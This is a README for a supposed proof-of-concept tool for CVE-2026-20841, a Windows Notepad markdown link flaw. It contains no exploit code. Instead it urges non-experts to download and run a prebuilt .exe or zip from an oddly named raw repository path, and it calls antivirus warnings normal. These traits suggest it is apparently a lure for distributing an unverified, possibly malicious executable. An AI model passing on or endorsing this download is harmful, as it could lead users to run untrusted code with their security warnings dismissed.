CVE-2026-20841 is a known security weakness in the Windows Notepad application. It affects the markdown feature, which lets Notepad display formatted text with clickable links. This weakness happens because the markdown engine running inside Notepad does not limit the types of links (called URL protocols) it allows. This means an attacker can create a link that, when clicked, causes Notepad to run programs or commands that the user did not intend to run.
This tool provides a Proof of Concept (PoC) to show how this security flaw works. It helps security researchers and technology experts learn how the vulnerability works and test if systems are at risk.
This project is designed for people who want to:
- Understand the risk of CVE-2026-20841 in Windows Notepad
- Test if their systems are vulnerable to this security issue
- Improve their security measures against remote code execution attacks
No programming skills are required to run this software. It is best used by IT professionals or curious users who want to check their Windows devices.
Before you use this software, make sure your computer fits these requirements:
- Running Windows 10 or later versions
- Notepad application installed (This is included by default on Windows)
- Internet connection to download files
- Enough disk space for download (under 10 MB)
The test tool may need permission to run programs on your PC. You might see Windows Defender or antivirus warnings. This is normal because the tool simulates how real attacks could work.
You should only run the tool on computers you own or have permission to test.
To get the software, do the following:
-
Go to the release page.
Click this big button to visit the downloads area:
-
Choose the latest release on the page.
Look for the file that fits your system (usually a.exeor.zipfile). -
Download the file.
Click the file name link to start downloading. -
Run or Unpack the software.
- If it is a
.exefile, double-click it to run. - If it is a
.zipfile, right-click and choose “Extract All,” then open the folder and double-click the.exeinside.
- Follow on-screen instructions.
The software will guide you through the testing process.
After installation, you will see a simple window with instructions. Here is how to proceed:
- Step 1: Start the test by clicking the “Run Test” button.
- Step 2: The software will simulate a markdown file with special links.
- Step 3: It will show if your Notepad allows unsafe clickable links.
- Step 4: Review the test report inside the app or in a file on your desktop.
The tool creates a fake markdown file containing links that use unusual URL handlers. Normally, these links should not open programs without permission. But because of CVE-2026-20841, Notepad does not block them.
When you run the test, the software tries to open these links in Notepad. If it succeeds, Notepad is vulnerable and can let attackers run harmful code.
- Easy one-click test launch
- Clear report showing if your system is affected
- Simple user interface designed for non-experts
- Supports recent Windows versions
- Small download size
To keep testing accuracy, download new versions when available:
- Visit the same release page again:
https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip - Find the newest version at the top.
- Download and run the new file as described in the download section.
If you encounter problems, you can:
- Check the “Issues” tab on the GitHub page to see if others have the same problem
- Use the “Discussions” page for questions and answers
- Find contact information for developers in the repository’s main page
This tool shows how hackers could use security flaws. Use it responsibly:
- Do not use on devices you don’t own or have permission to test.
- Always keep your software, including Windows, updated.
- Avoid clicking suspicious links in unknown files or emails.
This project relates to:
- Security research for Windows Notepad
- Command injection vulnerabilities
- Remote code execution (RCE) risks
- Cybersecurity awareness
- Vulnerability testing tools
You can start testing now by visiting the downloads page:
Download CVE-2026-20841 Tool